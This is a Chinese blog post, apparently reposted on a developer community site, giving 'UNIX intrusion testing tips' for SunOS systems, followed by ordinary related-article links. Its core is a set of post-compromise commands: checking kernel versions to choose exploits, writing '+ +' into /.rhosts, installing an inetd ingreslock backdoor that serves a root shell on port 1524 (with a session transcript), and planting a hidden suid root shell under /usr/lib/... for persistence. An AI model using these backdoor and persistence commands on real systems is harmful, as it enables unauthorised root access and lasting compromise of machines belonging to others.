备案控制台

开发者社区开发与运维文章正文

UNIX入侵测试TIPS[20101027更新]

2017-11-08 986

版权

版权声明：

本文内容由阿里云实名注册用户自发贡献，版权归原作者所有，阿里云开发者社区不拥有其著作权，亦不承担相应法律责任。具体规则请查看《阿里云开发者社区用户服务协议》和《阿里云开发者社区知识产权保护指引》。如果您发现本社区中有涉嫌抄袭的内容，填写侵权投诉表单进行举报，一经查实，本社区将立刻删除涉嫌侵权内容。

简介：

这里只提示具体指令及相关功能,具体在实战中的利用由各位自己去摸索,有任何问题可以留言这里我的讲解侧重SUNOS,其他UNIX系统大同小异

1,uname -a 这个不用多说了查看内核版本,找对应EXP吧

2,cat /etc/release 同上~不过对SUNOS来说可以查看SunOS 和对应的Solaris版本

3,ls -al 看看用户目录下有没有.rhosts文件,看看有没有以前的入侵者

4,ps –ef 查看进程

5,netstat -an|grep LISTEN 查看有没有可以端口

6,cat /etc/hosts 查看本机的内部网络为内网渗透做准备

7,echo “+ +” >/.rhosts

echo 'ingreslock stream tcp nowait root /bin/ksh ksh -i' > /tmp/.x

/usr/sbin/inetd -s /tmp/.x

rm -f /tmp/.x

telnet localhost 1524

Trying 127.0.0.1...

Connected to localhost. Escape character is '^]'.

# id

ksh: id^M: not found

# id;

uid=0(root) gid=0(root)

ksh: ^M: not found

# exit;

Connection closed by foreign host.

Exit

简单的Telnet后门

8,有时用Gcc编译EXP时出错可以挂上nsl和socket库再试试

gcc -o exp exp.c -lsocket -lnsl

9,suid root shell:

mkdir /usr/lib/...

cp /bin/ksh /usr/lib/.../.x

chmod +s /usr/lib/.../.x

exit

以任意用户登录:$ /usr/lib/.../.x

本文持续更新......

本文转sinojelly51CTO博客，原文链接：http://blog.51cto.com/pnig0s1992/411592，如需转载请自行联系原作者

文章标签：

Unix

Shell

C语言

关键词：

测试tips

测试更新

技术小美

目录

相关文章

游客g2r3yknu46ngq

|

XML JSON 前端开发

使用Mock技术帮助提升测试效率的小tips，你知道几个？

使用Mock技术帮助提升测试效率的小tips，你知道几个？

游客g2r3yknu46ngq

211 0 1

richard1230

|

测试技术

赏金猎人系列-如何测试注册(Sign up)功能以及相关Tips

正文本文承接前文赏金猎人系列-如何测试注册(Sign up)功能,继续梳理注册功能的测试流程,相关文章还有: 注册功能测试小结

richard1230

302 1 1

richard1230

|

安全测试技术

漏洞赏金猎人系列-如何测试注册(Sign up)功能(V)以及相关Tips

本文为本系列的最后一篇,梳理了SignUp最后几种测试方法(tips); 前面相关的文章有: 注册功能测试小结赏金猎人系列-如何测试注册(Sign up)功能赏金猎人系列-如何测试注册(Sign up)功能以及相关Tips 漏洞赏金猎人系列-如何测试注册(Sign up)功能(IV)以及相关Tips

richard1230

266 1 1

cejze5tbulhvo

|

测试技术

开发询问测试是否能提前更新测试环境，测试应该如何分析和决策？

开发询问测试是否能提前更新测试环境，测试应该如何分析和决策？

cejze5tbulhvo

301 0 0

软件测试帅哥

|

测试技术

软件测试之【移动端测试】软件更新:强制更新和非强制更新

软件测试之【移动端测试】软件更新:强制更新和非强制更新

软件测试帅哥

590 0 0

店家小二

|

存储 Kubernetes 应用服务中间件

Kubernetes ConfigMap热更新测试 – 探究ConfigMap的创建和更新流程

ConfigMap热更新测试 ConfigMap是用来存储配置文件的kubernetes资源对象，所有的配置内容都存储在etcd中，下文主要是探究 ConfigMap 的创建和更新流程，以及对 ConfigMap 更新后容器内挂载的内容是否同步更新的测试。

店家小二

2874 0 0

技术小甜

|

.NET 测试技术

《asp.net夜话》一书测试视频免费发布（2009年4月13日更新）

技术小甜

1225 0 0

晚来风急

|

存储 Windows

微软发誓在内部对Windows 10更新进行全面测试

晚来风急

970 0 0

一个幽默的程序员

|

11月前

|

数据可视化前端开发测试技术

接口测试新选择：Postman替代方案全解析

在软件开发中，接口测试工具至关重要。Postman长期占据主导地位，但随着国产工具的崛起，越来越多开发者转向更适合中国市场的替代方案——Apifox。它不仅支持中英文切换、完全免费不限人数，还具备强大的可视化操作、自动生成文档和API调试功能，极大简化了开发流程。

一个幽默的程序员

633 2 2

蓝易云

|

6月前

|

Java 测试技术容器

Jmeter工具使用：HTTP接口性能测试实战

希望这篇文章能够帮助你初步理解如何使用JMeter进行HTTP接口性能测试，有兴趣的话，你可以研究更多关于JMeter的内容。记住，只有理解并掌握了这些工具，你才能充分利用它们发挥其应有的价值。+

蓝易云

1049 23 23

热门文章

最新文章

从0到1：天猫AI测试用例生成的实践与突破

告别蛮力：让测试数据生成变得智能而高效

测试金字塔：别再只盯着UI自动化了

告别脆弱：构建稳定UI自动化测试的3个核心策略

测试之道：重构你的测试策略 - 测试金字塔模型

测试金字塔：构建高效自动化测试策略的基石

测试金字塔：构建高效自动化测试策略的基石

测试的艺术：掌握测试金字塔，构建高效测试策略

面试性能测试总被刷？学员真实遇到的高频问题全解析！

Metasploit Pro 4.22.8-20251014 (Linux, Windows) - 专业渗透测试框架

【YashanDB知识库】MySQL的FROM_UNIXTIME和UNIX_TIMESTAMP如何在YashanDB改写

FreeBSD 13.5 正式版发布 - 高性能开源 Unix 系统

组合思维：Unix 哲学到底给现代编程带来哪些重要启示？

Unix：Linux的“祖师爷”

UNIX/Linux 上的安装

UNIX数据恢复—UNIX系统常见故障问题的数据恢复方案

操作系统的演化与比较：从Unix到Linux

【换行符】Windows、Unix、Mac不同操作系统的回车符\r和换行符\n

Python编程--UNIX口令破解机

UNIX操作系统的开发始于1969年

相关课程

更多

MSE微服务测试最佳实践 - 自动化回归

相关电子书

更多

移动互联网测试到质量的转变

给ITer的技术实战进阶课-阿里CIO学院独家教材（四）

F2etest — 多浏览器兼容性测试整体解决方案

下一篇

安全设备篇——WAF